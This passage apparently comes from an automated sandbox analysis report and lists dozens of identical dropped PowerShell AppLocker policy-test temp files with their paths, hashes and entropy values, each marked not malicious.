Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25jyogrn.avg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2d4aol10.udy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2em5h0sq.jsr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3f3zik5z.jsc.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3y221ybc.1pp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40prao3n.ggw.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4o1bfzpi.t5o.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ihk22f1.ppz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nldbobp.4hp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3geh2p3.1mm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbxp4cen.rtv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duqdqyxv.2ub.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvtlrfrr.tcw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbgq1xbu.bqh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv533bwt.s22.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fy14trb0.14m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gel5uen0.h4b.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gpv4csrc.za5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2dv4gmj.ump.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5pih2zj.pod.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jauhjlik.kdi.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdmwhlyg.pdj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfkchjs5.2pd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm0h5y5c.5vj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5vyu05q.g5q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2zm5ma3.lov.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0t2vilr.dcf.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2lavz3t.sen.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3p2zzd3.ebt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgyfo44k.gqp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mh45t1pl.c0a.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlademmb.x1o.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlfwegtg.qpd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nts1gb3r.cs0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o11vb4qo.5df.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
